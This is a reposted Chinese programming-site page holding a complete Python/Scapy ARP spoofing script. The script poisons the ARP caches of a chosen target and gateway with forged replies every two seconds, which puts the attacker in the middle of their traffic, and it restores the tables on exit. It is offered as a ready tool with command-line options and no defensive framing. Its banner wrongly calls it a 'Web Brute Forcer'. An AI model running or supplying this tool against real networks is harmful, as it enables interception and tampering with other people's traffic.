ICode9

精准搜索请尝试: 精确搜索
首页 > 编程语言> 文章详细

利用python编写的ARP欺骗攻击

2022-03-30 18:31:54  阅读:223  来源: 互联网

标签:ARP target python self ip2 mac ip1 欺骗 gateway


from scapy.all import *
import sys
import time
import optparse

def get_args():
    parser = optparse.OptionParser(usage='<Prog -t target -g gateway>')
    parser.add_option('-t', '--target', dest='target', type='string', help="Specify IP of target")
    parser.add_option('-g', '--gateway', dest='gateway', type='string', help="Specify IP of gateway")
    options, args = parser.parse_args()
    if options.target is None:
        print(parser.usage)
        sys.exit()
    if options.gateway is None:
        print(parser.usage)
        sys.exit()

    return options.target, options.gateway

def banner():
    banner = """
                ****************************

                  Web Brute Forcer By Jason

                ****************************
        """
    print(banner)


class ArpSpoof:
    """
    Args:
    target: IP address of target to spoof attack
    gateway: IP addrss of gateway
    """

    def __init__(self, target, gateway):
        self.target = target
        self.gateway = gateway

    def get_mac(self, ip):
        packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst=ip)
        res = srp(packet, verbose=False)
        return res[0].res[0][1].hwsrc
    
    def spoofer(self,ip1, ip2):
        ip1_mac = self.get_mac(ip1)
        ip2_mac = self.get_mac(ip2)
        packet1 = ARP(op=2,pdst=ip1,hwdst=ip1_mac, psrc=ip2)
        packet2 = ARP(op=2,pdst=ip2,hwdst=ip2_mac, psrc=ip1)
        send(packet1, verbose=False)
        send(packet2, verbose=False)

    def restore(self,ip1, ip2):
        ip1_mac = self.get_mac(ip1)
        ip2_mac = self.get_mac(ip2)
        packet1 = ARP(op=2,pdst=ip1,hwdst=ip1_mac, psrc=ip2, hwsrc=ip2_mac)
        packet2 = ARP(op=2,pdst=ip2,hwdst=ip2_mac, psrc=ip1, hwsrc=ip1_mac)
        send(packet1, verbose=False)
        send(packet2, verbose=False)
        
    
    def run(self):
        send_count = 0
        try:
            while True:
                self.spoofer(self.target, self.gateway)                
                send_count = send_count + 2
                print('\r Packet sent: %d' % send_count, end="")
                time.sleep(2)

        except KeyboardInterrupt:
            print("Exit the program and restore the network...")
            self.restore(self.target, self.gateway)
            self.restore(self.gateway, self.target)
            
            

if __name__ == '__main__':
    banner()
    target, gateway = get_args()
    arp_spoof = ArpSpoof(target, gateway)
    arp_spoof.run()

 

标签:ARP,target,python,self,ip2,mac,ip1,欺骗,gateway
来源: https://www.cnblogs.com/jason-huawen/p/16078418.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有